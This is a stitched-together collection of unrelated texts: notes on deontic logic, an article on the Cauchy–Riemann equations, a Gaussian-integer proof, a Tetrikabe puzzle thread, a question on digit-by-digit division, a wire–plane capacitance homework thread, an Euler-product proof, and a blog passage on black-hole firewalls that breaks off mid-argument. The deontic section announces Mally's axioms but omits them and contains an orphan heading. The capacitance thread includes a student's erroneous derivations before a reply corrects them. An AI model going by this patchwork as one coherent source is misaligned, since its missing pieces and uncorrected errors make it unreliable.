Ernst Mally, a pupil of Alexius Meinong, was the first to propose a formal system of deontic logic in his Grundgesetze des Sollens, and he founded it on the syntax of Whitehead's and Russell's propositional calculus. Mally's deontic vocabulary consisted of the logical constants U and ∩, the unary connective !, and the binary connectives f and ∞.
• Mally read !A as "A ought to be the case".
• He read A f B as "A requires B".
• He read A ∞ B as "A and B require each other."
• He read U as "the unconditionally obligatory".
• He read ∩ as "the unconditionally forbidden".
Mally defined f, ∞, and ∩ as follows:
Def. f. A f B = A → !B
Def. ∞. A ∞ B = (A f B) & (B f A)
Def. ∩. ∩ = ¬U
Mally proposed five informal principles:
(i) If A requires B and if B then C, then A requires C.
(ii) If A requires B and if A requires C, then A requires B and C.
(iii) A requires B if and only if it is obligatory that if A then B.
(iv) The unconditionally obligatory is obligatory.
(v) The unconditionally obligatory does not require its own negation.
He formalized these principles and took them as his axioms:
Mally's First Deontic Logic and von Wright's First Plausible Deontic Logic
In von Wright's first system, obligatoriness and permissibility were treated as features of acts. It was found not much later that a deontic logic of propositions could be given a simple and elegant Kripke-style semantics, and von Wright himself joined this movement. The deontic logic so specified came to be known as "standard deontic logic," often referred to as SDL, KD, or simply D. It can be axiomatized by adding the following axioms to a standard axiomatization of classical propositional logic:
$O(A \rightarrow B) \rightarrow (OA \rightarrow OB)$

$OA \rightarrow PA$
In English, these axioms say, respectively:

If it ought to be that A implies B, then if it ought to be that A, it ought to be that B;

If it ought to be that A, then it is permissible that A.

FA, meaning it is forbidden that A, can be defined (equivalently) as $O \lnot A$ or $\lnot PA$.

The propositional system D can be extended to include quantifiers in a relatively straightforward way.
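To make the Kripke-style semantics concrete, here is a small illustrative sketch (the worlds, relation, and valuation are my own inventions, not from the post): OA holds at a world when A holds at every accessible world, PA when A holds at some accessible world, and the D axiom OA → PA is valid whenever the accessibility relation is serial:

```python
# Worlds and a serial accessibility relation (every world can see at least one world).
worlds = {"w1", "w2", "w3"}
R = {"w1": {"w2", "w3"}, "w2": {"w2"}, "w3": {"w2"}}

# Valuation: the set of worlds at which the atomic proposition A is true.
A = {"w2"}

def O(prop, w):
    """OA holds at w iff the proposition holds at every world accessible from w."""
    return all(v in prop for v in R[w])

def P(prop, w):
    """PA holds at w iff the proposition holds at some world accessible from w."""
    return any(v in prop for v in R[w])

# The D axiom OA -> PA holds at every world of this serial frame:
d_axiom_valid = all((not O(A, w)) or P(A, w) for w in worlds)
```

If some world had no accessible worlds, O would hold vacuously while P failed, which is exactly why the D axiom characterizes serial frames.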
An important problem of deontic logic is that of how to properly represent conditional obligations, e.g. If you smoke (s), then you ought to use an ashtray (a). It is not clear that either of the following representations is adequate:
$O(\mathrm{smoke} \rightarrow \mathrm{ashtray})$

$\mathrm{smoke} \rightarrow O(\mathrm{ashtray})$
Under the first representation it is vacuously true that if you commit a forbidden act, then you ought to commit any other act, regardless of whether that second act was obligatory, permitted or forbidden (Von Wright 1956, cited in Aqvist 1994). Under the second representation, we are vulnerable to the gentle murder paradox, where the plausible statements if you murder, you ought to murder gently, you do commit murder and to murder gently you must murder imply the less plausible statement: you ought to murder.
Some deontic logicians have responded to this problem by developing dyadic deontic logics, which contain binary deontic operators:
$O(A \mid B)$ means it is obligatory that A, given B

$P(A \mid B)$ means it is permissible that A, given B.
(The notation is modeled on that used to represent conditional probability.) Dyadic deontic logic escapes some of the problems of standard (unary) deontic logic, but it is subject to some problems of its own.
|
|
# Cauchy-Riemann conditions
(Redirected from Cauchy–Riemann conditions)
d'Alembert–Euler conditions
Conditions that must be satisfied by the real part $u(x, y)$ and the imaginary part $v(x, y)$ of a complex function $f(z) = u(x, y) + iv(x, y)$, $z = x + iy$, for it to be monogenic and analytic as a function of a complex variable.
A function $f(z) = u(x, y) + iv(x, y)$, defined in some domain $D$ in the complex $z$-plane, is monogenic at a point $z = x + iy \in D$, i.e. has a derivative at $z$ as a function of the complex variable $z$, if and only if its real and imaginary parts $u$ and $v$ are differentiable at $(x, y)$ as functions of the real variables $x$ and $y$, and if, moreover, the Cauchy–Riemann equations hold at that point:

$$\frac{\partial u}{\partial x} = \frac{\partial v}{\partial y}, \qquad \frac{\partial u}{\partial y} = -\frac{\partial v}{\partial x} \tag{1}$$
If the Cauchy–Riemann equations are satisfied, then the derivative can be expressed in any of the following forms:

$$f'(z) = \frac{\partial u}{\partial x} + i\,\frac{\partial v}{\partial x} = \frac{\partial v}{\partial y} - i\,\frac{\partial u}{\partial y} = \frac{\partial u}{\partial x} - i\,\frac{\partial u}{\partial y} = \frac{\partial v}{\partial y} + i\,\frac{\partial v}{\partial x}$$
A function $f(z)$, defined and single-valued in a domain $D$, is analytic in $D$ if and only if its real and imaginary parts are differentiable functions satisfying the Cauchy–Riemann equations throughout $D$. Each of the two functions $u$ and $v$ of class $C^1$ satisfying the Cauchy–Riemann equations (1) is a harmonic function of $x$ and $y$; the conditions (1) constitute conjugacy conditions of these two harmonic functions: knowing one of them, the other may be found by integration.
The conditions (1) are valid for any two orthogonal directions $s$ and $n$, with the same mutual orientation as the $x$- and $y$-axes, in the form:

$$\frac{\partial u}{\partial s} = \frac{\partial v}{\partial n}, \qquad \frac{\partial u}{\partial n} = -\frac{\partial v}{\partial s}$$

For example, in polar coordinates $(r, \phi)$, for $r \neq 0$:

$$\frac{\partial u}{\partial r} = \frac{1}{r}\,\frac{\partial v}{\partial \phi}, \qquad \frac{\partial v}{\partial r} = -\frac{1}{r}\,\frac{\partial u}{\partial \phi}$$
Defining the complex differential operators by

$$\frac{\partial}{\partial z} = \frac{1}{2}\left(\frac{\partial}{\partial x} - i\,\frac{\partial}{\partial y}\right), \qquad \frac{\partial}{\partial \bar z} = \frac{1}{2}\left(\frac{\partial}{\partial x} + i\,\frac{\partial}{\partial y}\right),$$

one can rewrite the Cauchy–Riemann equations (1) as

$$\frac{\partial f}{\partial \bar z} = 0.$$

Thus, a differentiable function of the variables $x$ and $y$ is an analytic function of $z$ if and only if $\partial f / \partial \bar z = 0$.
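As an illustration added here (not part of the original article), the criterion $\partial f/\partial \bar z = 0$ can be checked numerically with central finite differences: $f(z) = z^2$ is analytic, while $g(z) = \bar z$ is not.

```python
def d_dzbar(f, x, y, h=1e-6):
    """Central-difference estimate of df/dzbar = (1/2)(df/dx + i df/dy)."""
    fx = (f(x + h, y) - f(x - h, y)) / (2 * h)
    fy = (f(x, y + h) - f(x, y - h)) / (2 * h)
    return 0.5 * (fx + 1j * fy)

def f(x, y):
    z = complex(x, y)
    return z * z           # analytic everywhere: d/dzbar should vanish

def g(x, y):
    return complex(x, -y)  # the conjugate zbar: nowhere analytic, d/dzbar = 1

small = abs(d_dzbar(f, 1.3, -0.7))  # essentially zero, up to round-off
one = d_dzbar(g, 1.3, -0.7)         # essentially 1
```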
For analytic functions $f(z) = u + iv$ of several complex variables $z_j = x_j + iy_j$, $j = 1, \ldots, n$, the Cauchy–Riemann equations constitute a system of partial differential equations (overdetermined when $n > 1$) for the functions $u$ and $v$:

$$\frac{\partial u}{\partial x_j} = \frac{\partial v}{\partial y_j}, \qquad \frac{\partial u}{\partial y_j} = -\frac{\partial v}{\partial x_j}, \qquad j = 1, \ldots, n, \tag{2}$$

or, in terms of the complex differentiation operators:

$$\frac{\partial f}{\partial \bar z_j} = 0, \qquad j = 1, \ldots, n.$$

Each of the two functions $u$ and $v$ of class $C^1$ satisfying the conditions (2) is a pluriharmonic function of the variables $x_j$ and $y_j$ ($j = 1, \ldots, n$). When $n > 1$ the pluriharmonic functions constitute a proper subclass of the class of harmonic functions. The conditions (2) are conjugacy conditions for two pluriharmonic functions $u$ and $v$: knowing one of them, one can determine the other by integration.
The conditions (1) apparently occurred for the first time in the works of J. d'Alembert [1]. Their first appearance as a criterion for analyticity was in a paper of L. Euler, delivered at the Petersburg Academy of Sciences in 1777 [2]. A.L. Cauchy utilized the conditions (1) to construct the theory of functions, beginning with a memoir presented to the Paris Academy in 1814 (see [3]). The celebrated dissertation of B. Riemann on the fundamentals of function theory dates from 1851 (see [4]).
#### References
[1] J. d'Alembert, "Essai d'une nouvelle théorie de la résistance des fluides", Paris (1752)
[2] L. Euler, Nova Acta Acad. Sci. Petrop., 10 (1797) pp. 3–19
[3] A.L. Cauchy, "Mémoire sur les intégrales définies", Oeuvres complètes Ser. 1, 1, Paris (1882) pp. 319–506
[4] B. Riemann, "Grundlagen für eine allgemeine Theorie der Funktionen einer veränderlichen komplexen Grösse", in: H. Weber (ed.), Riemann's gesammelte math. Werke, Dover, reprint (1953) pp. 3–48
[5] A.I. Markushevich, "Theory of functions of a complex variable", 1, Chelsea (1977) Chapt. 1 (Translated from Russian)
[6] B.V. Shabat, "Introduction to complex analysis", 1–2, Moscow (1976) 1, Chapt. 1; 2, Chapt. 1 (In Russian)
|
|
## In the Gaussian integers, the conjugate of a prime is prime
Prove that if $a+bi$ is irreducible in $\mathbb{Z}[i]$, then so is $b+ai$.
Note that conjugation preserves multiplication in $\mathbb{Z}[i]$; $\overline{\alpha\beta} = \overline{\alpha}\,\overline{\beta}$ for all $\alpha$ and $\beta$. As a consequence, if $\alpha$ is irreducible then $\overline{\alpha}$ is as well: any factorization $\overline{\alpha} = \beta\gamma$ conjugates to $\alpha = \overline{\beta}\,\overline{\gamma}$, and conjugation sends units to units.
Note that $b+ai = \overline{(-i)(a+bi)}$. Since $-i$ is a unit, $(-i)(a+bi)$ is irreducible whenever $a+bi$ is; by the remark above, its conjugate $b+ai$ is then irreducible as well.
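As an illustrative numerical companion (my own addition, using a sufficient condition rather than the proof's argument): a Gaussian integer whose norm $N(a+bi) = a^2 + b^2$ is a rational prime is irreducible in $\mathbb{Z}[i]$, and since the norm is symmetric in $a$ and $b$, this test gives the same verdict for $a+bi$ and $b+ai$.

```python
def has_prime_norm(a, b):
    """True if N(a+bi) = a^2 + b^2 is a rational prime.

    A prime norm is sufficient (not necessary) for irreducibility in Z[i]:
    e.g. 3 has norm 9 yet is irreducible."""
    n = a * a + b * b
    if n < 2:
        return False
    return all(n % d != 0 for d in range(2, int(n ** 0.5) + 1))

# the norm, and hence this sufficient test, is unchanged by swapping a and b
assert has_prime_norm(2, 3) == has_prime_norm(3, 2)  # norm 13 both ways
```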
|
|
# Tetrikabe: Hiding in the Corners
This puzzle is dedicated to Sciborg. Copying the dear gentleperson, some of the 4s are hiding in the corners.
Rules: (Nurikabe section shamelessly stolen from an earlier puzzle by @jafe)
• Unshaded cells are divided into regions, all of which contain exactly one number. The number indicates how many unshaded cells there are in that region.
• SPECIAL RULE: the regions will form a tetromino set, with rotation and reflection allowed.
• Regions of unshaded cells cannot be (orthogonally) adjacent to one another, but they may touch at a corner.
• All shaded cells must be connected.
• There are no groups of shaded cells that form a 2 × 2 square anywhere in the grid.
I've included all available tetrominoes as a reference.
A playable version of this puzzle can be found here. The link leads to a puzz.link editor. Note that this editor won't force you to use the tetromino rule, and it has a timer.
The first answer with a fully-explained logical solution path will get the checkmark. I welcome multiple answers, if later ones can show a better-explained or more elegant path.
CSV:
,,,,,,4
,,,,,,
,,,4,,,
,,4,,4,,
,,,,,,
,,,,,,
4,,,,,,
• Should each tetromino be used exactly once? Also, this seems quite easy even to brute force since the shape is restricted. But good puzzle! – justhalf Dec 2 '20 at 4:10
• Yes, each tetromino should be used exactly once, that's what is meant by a "tetromino set". And of course you could brute-force it due to the small size, but you can do that with any small puzzle. The fun is supposed to be finding the elegant solution. – bobble Dec 2 '20 at 4:12
@Bubbler and others solved this before me, but I figured I would share my solve path too, since I love that this puzzle was dedicated to me!
So first, I filled in the obvious squares to give me a starting point:
Then I saw that there were two 2x2 regions that needed to be filled with island, since we can't have any 2x2 oceans. Those were these regions here:
Then I realized those 2x2 regions could only be reached in specific ways - that is, I needed to have the bottom right piece reach downwards, and a piece reaching up to the top left corner. So I knew that I had to place the L and the S pieces in those two spots, although I wasn't sure yet which was which.
I filled in some oceans. And, since I knew the top piece had to reach upwards:
From here it was clear to me that the L piece had to go in this spot, since the S-piece wouldn't fit. So now I had placed a tetromino, and I knew the S piece had to go in the other spot in the only orientation that made sense.
Now I looked at my grid again. Having placed the L and S, it was clear to me that the top right corner must be the T piece. If it was the O piece, there would be a 2x2 region left unfilled, and there wasn't enough room for it to be the I piece.
So I placed the T:
And from there, the final grid was clear:
Apparently too late to the game, but anyway here it goes. Hope this one is the intended solving path. (I think the existing two answers have at least some logical leaps.)
Step 1:
Start by marking walls between the crammed fours at the center. Looking at top left and bottom right 2x2 corners, the only cell that can be occupied by a tetromino is the inner cell (R2C2 and R6C6 respectively).
Step 2:
R2C2 must be part of a 4 starting from either R3C4 or R4C3. That piece is an L either way. R6C6 must share the area with R4C5, and it can't be L, so it must be an S.
Step 3:
In order to avoid 2x2 wall at R6-7C4-5, the only way is to place an I horizontally at the bottom. (Placing an L starting from R4C3 to cover R6C4 doesn't work because L must contain R2C2.)
Finally:
Placing L on the left side makes problems, so L should go right and cover R3C4. Then it is straightforward to see that the middle left must be an O and the upper right corner must be a T.
• This is indeed the intended solve path. The exact reason that placing an L on the left side causes problems is that R5C3 must be unshaded to prevent a 2x2 in R56C34. – bobble Dec 2 '20 at 4:56
• Oh yes, that works too. – Bubbler Dec 2 '20 at 4:58
Logical deductions by picture:
First of all, the blue tiles represent some obvious deductions. Then I saw R2C2 could not be blue... So I tried this hypothetical situation....
But using this there was no way to complete the grid...
So I saw that R2C2 could only be covered by one of the tetrominoes at the top of the image. Then the square at R6C6 can only be covered with the remaining tetromino:
Then the tetromino in the bottom left could only be the straight (I) piece, because neither of the two remaining pieces fits there. The middle-left tetromino could not be the T tetromino, otherwise it would block regions of blue from each other, so it has to be the square. That makes the top right a T, and with a little bit of fiddling I solved it.
• Please explain those deductions with words, because it isn't obvious what you're doing in those pictures. – bobble Dec 2 '20 at 4:32
• While you're doing that, would it be possible to crop the pictures so that all the extra stuff isn't distracting from the grid? (Also center that picture that's off-center with the grid off-screen). – bobble Dec 2 '20 at 4:36
• Please don't post answers without logical explanations if you're only going to add in logical explanations immediately after. Even if you don't intend for it to come off this way, it appears like you're just posting to "claim a spot" and don't care about answer quality. (We talked about this on meta in the context of "lists of clues" puzzles, but it applies equally to situations like this.) – Deusovi Dec 2 '20 at 5:06
• Additionally, screenshots with a bunch of clutter like this are not particularly useful in answers. The extra bits are distracting and make the answer very hard to read -- overpowering the text that contains the actual explanation. It means that the answer will likely not be very useful for any future solvers. – Deusovi Dec 2 '20 at 5:08
• Given that you're using an image editor, you could have used "save image" feature within the app, which give much cleaner images than your screenshots here. We're not blind, we're just trying to improve the post quality. – Bubbler Dec 2 '20 at 5:26
|
|
# How to solve division one digit at a time?
I’m developing a computer program and I’m trying to work out some arithmetic algorithms for working with very large numbers. So far I have worked out a plan for addition, subtraction, and multiplication but division seems to be much more complicated. The numbers I’m working with are very large and I cannot process the entire number at once, so I have to perform these math operations piece by piece.
NOTE: For the programmers here, I am using Java which has the BigDecimal class for working with large numbers, but without going into a lengthy explanation I would like to create my own version.
I have looked at the source code for the division in Java’s MutableBigInteger to see if I could get some ideas from it, but it does a lot of things that I don’t know why it’s doing them. I’ve also read up on various division algorithms and they all seem to be about the same level of complexity. But I think once I see the process at work on an actual math problem I can work out the coding details.
I’ve worked out some very simple math problems processing only one digit at a time instead of the entire number.
For addition, this is very simple to do:
6.8 + 8.5 =
8+5=3 (carry 1)
6+8+1=5 (carry 1)
1
And the result is “1 5 3” or 15.3.
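The carrying scheme above can be sketched directly as code (digits stored least significant first; the decimal point is separate bookkeeping):

```python
def add_digits(a, b, base=10):
    """Digit-by-digit addition with carries; digits are least significant first."""
    out, carry = [], 0
    for i in range(max(len(a), len(b))):
        da = a[i] if i < len(a) else 0
        db = b[i] if i < len(b) else 0
        carry, digit = divmod(da + db + carry, base)
        out.append(digit)
    if carry:
        out.append(carry)
    return out

# 68 + 85 -> 153, matching the "1 5 3" worked example above
assert add_digits([8, 6], [5, 8]) == [3, 5, 1]
```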
Division...not so simple apparently. Here is a basic example which I can’t seem to get to the answer “3” working with only one digit at a time:
7.2 / 2.4 = 3
I’ve tried a few methods such as dividing each digit to get an integer value and using the modulus operation for the remainder to combine with the next digit over, but I’ve only made a mess of things so far. This doesn’t seem like it should be that difficult, but it’s proving to be (I guess that’s why the division algorithms I’ve looked at are so complex)...so I think I need to enlist the help of some math gurus here. Any help on this would be greatly appreciated. Thanks. :)
• I am not sure this is possible if you want to break up the digits of the divisor. I could very well be wrong though. – ixsetf Dec 12 '15 at 2:48
• You will do far better to ask this question on a programming forum or to look into a book like Knuth's Seminumerical Algorithms. If you want to figure a method out for yourself, then you should first of all understand the pencil-and-paper process called long division. – Rob Arthan Dec 12 '15 at 2:50
• @ixsetf, yes, breaking up the divisor is a tricky part that I can't quite figure out. But now I don't feel so bad for not getting it yet...this has been driving me nuts for several days. It seems like it is possible because the division for Java's MutableBigInteger does it. But I've looked at the source code for it and I just don't understand many of the things it does and the comments in the source code are not very detailed or helpful. Seeing a basic math problem worked out which shows how it is done to better understand the process would be very helpful, but I can't find anything like this. – Tekkerue Dec 12 '15 at 5:18
• @Tekkerue Unless there is a specific reason why you need to break the divisor up digit by digit, I would suggest taking it as a whole and using the long division approach Rob Arthan mentioned. It will most likely be more efficient than any method taking individual digits of the divisor. – ixsetf Dec 12 '15 at 5:36
• @Rob Arthan, I am on the programming forum stackoverflow & this is my first post on the math forum here, but I thought that since I'm asking to see a math problem worked out the math forum might be a better place for this question. I do understand normal long division, it's the splitting up the digits and putting them back together that is the hard part. Java's MutableBigInteger uses Knuth's "Algorithm D" and I've looked at both the source for MutableBigInteger and Knuth's book, but it's like reading the answer in another language. But seeing a real math problem worked out would really help. – Tekkerue Dec 12 '15 at 5:39
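Following the suggestion in the comments to take the divisor as a whole and mimic pencil-and-paper long division, a minimal sketch (names are my own) that produces quotient digits one at a time looks like this:

```python
def long_divide(dividend_digits, divisor, base=10):
    """Schoolbook long division, emitting one quotient digit per step.

    The dividend is a list of digits (most significant first); the divisor
    is taken as a whole number, as suggested in the comments.
    Returns (quotient_digits, remainder)."""
    quotient = []
    remainder = 0
    for d in dividend_digits:
        remainder = remainder * base + d   # "bring down" the next digit
        quotient.append(remainder // divisor)
        remainder %= divisor
    # strip leading zeros, keeping at least one digit
    while len(quotient) > 1 and quotient[0] == 0:
        quotient.pop(0)
    return quotient, remainder
```

For the example 7.2 / 2.4, scale both operands by 10 to clear the decimal points and divide 72 by 24, which yields quotient digit 3 and remainder 0; tracking the decimal point is separate bookkeeping, just as in the addition example.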
|
|
# Capacitance between a wire and a plane
1. Jun 21, 2017
### Kelly Lin
1. The problem statement, all variables and given/known data
2. Relevant equations
I want to know whether my process is correct?
THANKS!!!
3. The attempt at a solution
1. By using Gauss's law:
$$E\cdot 2\pi rz = \frac{\lambda z}{\epsilon_{0}}\Rightarrow E=\frac{\lambda}{2\pi\epsilon_{0} r}$$
In my coordinate system, $$E=\frac{\lambda}{2\pi\epsilon_{0}[y^{2}+(z-d)^{2}]^{1/2}}$$
Then,
$$V=-\int\mathbf{E}\cdot d\mathbf{l}=-\int_{0}^{z}\frac{\lambda}{2\pi\epsilon_{0}[y^{2}+(z-d)^{2}]^{1/2}}dz=\frac{\lambda}{2\pi\epsilon_{0}y}\ln{\frac{\left | \sqrt{d^{2}+y^{2}}-d \right |}{\left | \sqrt{(z-d)^{2}+y^{2}}+(z-d) \right |}}$$
Since $$C=\frac{Q}{V}$$, then
$$C(\text{per length})=2\pi\epsilon_{0}y\ln{\frac{\left | \sqrt{(z-d)^{2}+y^{2}}+(z-d) \right |}{\left | \sqrt{d^{2}+y^{2}}-d \right |}}$$
2.
Use $$\sigma=-\epsilon\frac{\partial V}{\partial z}|_{z=0}$$ to get the answer.
2. Jun 21, 2017
### haruspex
No, several errors.
You have written the expression for the field at some arbitrary point, (y, z).
First problem: the expression would be correct without the plate. Perhaps the charge distribution on the plate changes it?
Second problem: you integrate this wrt z,but leaving y as arbitrary. What path is that along?
Note that it would be simpler to run the integral in the other direction, avoiding the d-z.
Third problem: if you fix the second problem, you will get an integral that diverges at the wire end. You need to take into account the radius of the wire.
Fourth problem. You have z as a bound on the integral. What should it be?
3. Jun 21, 2017
### Kelly Lin
Now, I correct my process!
Firstly, the electric field generated by the plane is $$E_{plane}=\frac{\sigma}{2\epsilon_{0}}\hat{\mathbf{z}}$$.
Then, by the definition of potential, I can get the potential $$V_{plane}=-\frac{\sigma}{2\epsilon_{0}}z$$
On the other hand, the electric field generated by the wire is $$E_{wire}=\frac{\lambda}{2\pi\epsilon_{0}r}\hat{\mathbf{r}}$$
Then, the potential is $$V_{wire}=-\frac{\lambda}{2\pi\epsilon_{0}}\ln{\frac{r}{a}}=-\frac{\lambda}{2\pi\epsilon_{0}}\ln{\frac{\sqrt{(z-d)^{2}+y^{2}}}{a}}$$
Thus, the total potential will be $$V_{total}=-\frac{\sigma}{2\epsilon_{0}}z-\frac{\lambda}{2\pi\epsilon_{0}}\ln{\frac{\sqrt{(z-d)^{2}+y^{2}}}{a}}$$
Now, we can use the relation $$\sigma=-\epsilon\frac{\partial V}{\partial z}|_{z=0}$$ to get the surface charge density.
$$\sigma = \frac{\lambda}{2\pi} \frac{a}{\sqrt{(z-d)^{2}+y^{2}}} \frac{1}{2} \frac{2(z-d)}{\sqrt{(z-d)^{2}+y^{2}}} |_{z=0} + \frac{\sigma}{2}\\ \frac{\sigma}{2} = \frac{\lambda}{2\pi} \frac{-ad}{d^{2}+y^{2}}\\ \sigma = \frac{-\lambda a d}{\pi(d^{2}+y^{2})}$$
Then, we can go back and get the total potential in the system
$$V =-\frac{\lambda}{2\pi\epsilon_{0}}\ln{\frac{\sqrt{(z-d)^{2}+y^{2}}}{a}} + \frac{\lambda adz}{2\pi\epsilon_{0}(d^{2}+y^{2})}$$
and the capacitance per length of the wire is
$$C = \frac{\lambda}{V} = \frac{2\pi\epsilon_{0}(d^{2}+y^{2})}{adz} - 2\pi\epsilon_{0}\ln{\frac{a}{\sqrt{(z-d)^{2}+y^{2}}}}$$
4. Jun 21, 2017
### haruspex
That expression is for a uniformly charged plane. It won't be.
Consider the method of images.
5. Jun 21, 2017
### Kelly Lin
At first glance of the question, I came up with this method.
However, the plane isn't grounded so I am unsure if this method is valid for this problem?
6. Jun 21, 2017
### haruspex
It is an infinite plane. That is effectively grounded.
7. Jun 21, 2017
### Kelly Lin
Oh~ I see~
Thanks a lot!!!!!!!!!
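For anyone wanting to check the final answer from the image method: the standard image-charge result for a wire of radius $a$ whose axis is a distance $d$ above an infinite grounded plane is $C' = 2\pi\epsilon_0/\cosh^{-1}(d/a)$ per unit length, which tends to $2\pi\epsilon_0/\ln(2d/a)$ for $d \gg a$. A quick numerical sketch (the specific numbers are illustrative):

```python
import math

EPS0 = 8.8541878128e-12  # vacuum permittivity, F/m

def capacitance_per_length(d, a):
    """Exact image-charge result for a wire of radius a at height d (d > a)
    above an infinite grounded plane."""
    return 2 * math.pi * EPS0 / math.acosh(d / a)

def capacitance_approx(d, a):
    """Thin-wire approximation, valid for d >> a."""
    return 2 * math.pi * EPS0 / math.log(2 * d / a)

# a 1 mm radius wire 10 cm above the plane: the two agree closely
exact = capacitance_per_length(d=0.1, a=0.001)
approx = capacitance_approx(d=0.1, a=0.001)
```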
|
|
# Product Form of Sum on Completely Multiplicative Function
## Theorem
Let $f$ be a completely multiplicative arithmetic function.
Let the series $\displaystyle \sum_{n \mathop = 1}^\infty \map f n$ be absolutely convergent.
Then:
$\displaystyle \sum_{n \mathop = 1}^\infty \map f n = \prod_p \frac 1 {1 - \map f p}$
where the infinite product ranges over the primes.
## Proof
Define $P$ by:
$\ds \map P {A, K}$ $:=$ $\ds \prod_{\substack {p \mathop \in \mathbb P \\ p \mathop \le A} } \frac {1 - \map f p^{K + 1} } {1 - \map f p}$ where $\mathbb P$ denotes the set of prime numbers $\ds$ $=$ $\ds \prod_{\substack {p \mathop \in \mathbb P \\ p \mathop \le A} } \paren {\sum_{k \mathop = 0}^K \map f p^k}$ Sum of Geometric Sequence $\ds$ $=$ $\ds \sum_{v \mathop \in \prod \limits_{\substack {p \mathop \in \mathbb P \\ p \mathop \le A} } \set {0 \,.\,.\, K} } \paren {\prod_{\substack {p \mathop \in \mathbb P \\ p \mathop \le A} } \map f p^{v_p} }$ Product of Summations is Summation Over Cartesian Product of Products $\ds$ $=$ $\ds \sum_{v \mathop \in \prod \limits_{\substack {p \mathop \in \mathbb P \\ p \mathop \le A} } \set {0 \,.\,.\, K} } \map f {\prod_{\substack {p \mathop \in \mathbb P \\ p \mathop \le A} } p^{v_p} }$ as $f$ is completely multiplicative
Change the summing variable using:
$\ds \sum_{v \mathop \in V} \map g {\map h v} = \sum_{w \mathop \in \set {\map h v: v \mathop \in V} } \map g w$
where $h$ is a one to one mapping.
The Fundamental Theorem of Arithmetic guarantees a unique factorization for each positive natural number.
Therefore this function is one to one:
$\displaystyle \map h v = \prod_{\substack {p \mathop \in \mathbb P \\ p \mathop \le A} } p^{v_p}$
Then:
$\ds \map P {A, K} = \sum_{n \mathop \in \map Q {A, K} } \map f n$ by change of summing variable
where $\map Q {A, K}$ is defined as:
$\displaystyle \map Q {A, K} := \set {\prod_{\substack {p \mathop \in \mathbb P \\ p \mathop \le A} } p^{v_p} : v \in \prod_{\substack {p \mathop \in \mathbb P \\ p \mathop \le A} } \set {0 \,.\,.\, K} }$
Consider:
$\ds W = \lim_{\substack {A \mathop \to \infty \\ K \mathop \to \infty} } \map Q {A, K} = \set {\prod_{p \mathop \in \mathbb P} p^{v_p}: v \in \prod_{p \mathop \in \mathbb P} \set {0 \,.\,.\, \infty} }$
The construction defines it as the set of all possible products of positive powers of primes.
From the definition of a prime number, every positive natural number may be expressed as a prime or a product of powers of primes:
$k \in \N^+ \implies k \in W$
and also every element of W is a positive natural number:
$k \in W \implies k \in \N^+$
So $W = \N^+$.
Then taking limits on $\map P {A, K}$:
$\ds \lim_{\substack {A \mathop \to \infty \\ K \mathop \to \infty} } \map P {A, K} = \lim_{\substack {A \mathop \to \infty \\ K \mathop \to \infty} } \prod_{\substack {p \mathop \in \mathbb P \\ p \mathop \le A} } \frac {1 - \map f p^{K + 1} } {1 - \map f p}$ taking limits of both sides of the definition of $\map P {A, K}$
$\ds = \prod_{p \mathop \in \mathbb P} \frac 1 {1 - \map f p}$ since $\map f p^{K + 1} \to 0$, because $\displaystyle \sum_{n \mathop = 1}^{\infty} \map f n$ is convergent
On the other hand:
$\ds \lim_{\substack {A \mathop \to \infty \\ K \mathop \to \infty} } \map P {A, K} = \lim_{\substack {A \mathop \to \infty \\ K \mathop \to \infty} } \sum_{n \mathop \in \map Q {A, K} } \map f n$ from the expression for $\map P {A, K}$
$\ds = \sum_{n \mathop \in \N^+} \map f n$ substituting $W = \N^+$ (the order of summation is not yet specified)
$\ds = \sum_{n \mathop = 1}^\infty \map f n$ since the series is absolutely convergent, so the order does not alter the limit
$\blacksquare$
## Note
When the function $f$ is multiplicative but not completely multiplicative, the above derivation is still valid, except that we do not have the equality:
$\dfrac 1 {1 - \map f p} = \paren {1 + \map f p + \map f {p^2} + \cdots}$
Therefore, in this case we may write:
$\displaystyle \sum_{n \mathop = 1}^\infty \map f n = \prod_p \paren {1 + \map f p + \map f {p^2} + \cdots}$
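As a quick numerical illustration of the theorem (not part of the proof), take the completely multiplicative function $f(n) = n^{-2}$, whose series converges absolutely to $\pi^2/6$; the truncation cutoffs below are arbitrary choices:

```python
import math

def primes_upto(n):
    """Simple sieve of Eratosthenes."""
    sieve = [True] * (n + 1)
    sieve[0:2] = [False, False]
    for p in range(2, int(n ** 0.5) + 1):
        if sieve[p]:
            sieve[p * p :: p] = [False] * len(sieve[p * p :: p])
    return [p for p, is_p in enumerate(sieve) if is_p]

# f(n) = n^(-2) is completely multiplicative and its series is absolutely
# convergent, so the theorem asserts: sum_{n>=1} n^-2 = prod_p 1/(1 - p^-2).
partial_sum = sum(n ** -2 for n in range(1, 100001))
partial_product = 1.0
for p in primes_upto(1000):
    partial_product *= 1.0 / (1.0 - p ** -2)

print(partial_sum, partial_product)  # both close to pi^2/6 ≈ 1.6449
```

Both truncations agree with $\zeta(2)$ to roughly the size of the omitted tail, as expected.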
|
|
## Friday, October 19, 2012
### How empty is the black hole interior?
I've exchanged a dozen e-mails with Joe Polchinski, the best-known physicist on the original team that proposed the firewalls. We haven't converged, and Joe ultimately decided he didn't have time to continue and recommended that I write a paper instead (which he wouldn't read, I guess). However, he started to listen to what my resolution actually is, and I could see his actual objection to it, which seems flawed to me, as I discuss below.
Recall that $$\heartsuit$$ represents the (near) maximum entanglement and the firewall folks demonstrate that because $$R\heartsuit R'$$, the following things hold:$A\heartsuit B, \quad R_B \heartsuit B.$ The degrees of freedom $${\mathcal O}(r_s)$$ outside the black hole at $$t=0$$ when the black hole gets old are maximally entangled with some part $$R_B$$ of the early Hawking radiation (because $$R\heartsuit R'$$) as well as with the degrees of freedom inside the black hole $$A$$ which are "mirror symmetrically" located in the other Rindler wedge from (infalling) Alice's viewpoint.
But because a system can't be maximally entangled with two other systems, there is a paradox and one of the assumptions has to be invalid. AMPS continue by saying that what has to fail is the "emptiness of the black hole" assumption. They make another step and say that all field modes inside the old black hole are hugely excited so an infalling observer gets burned once she crosses the event horizon.
My answer is that the resolution is that $$A$$ and $$R_B$$ aren't really "two other systems"; $$A$$ is a heavily transformed subset of degrees of freedom in $$R_B$$ so $$B$$ is only near-maximally entangled with one system, not two, and everything is fine. I believe that this has been the very point of the black hole complementarity from the beginning.
Now, Joe's objection is the following:
Even Alice must have a state, a pure state or a mixed state, ready to make predictions. Up to $$t=0$$, she describes the early Hawking radiation in the same way as Bob (who stays outside). For example, this wave function may imply that $$N_b=5$$ for an occupation number measured outside the black hole; the state may be an $$N_b=5$$ eigenstate.
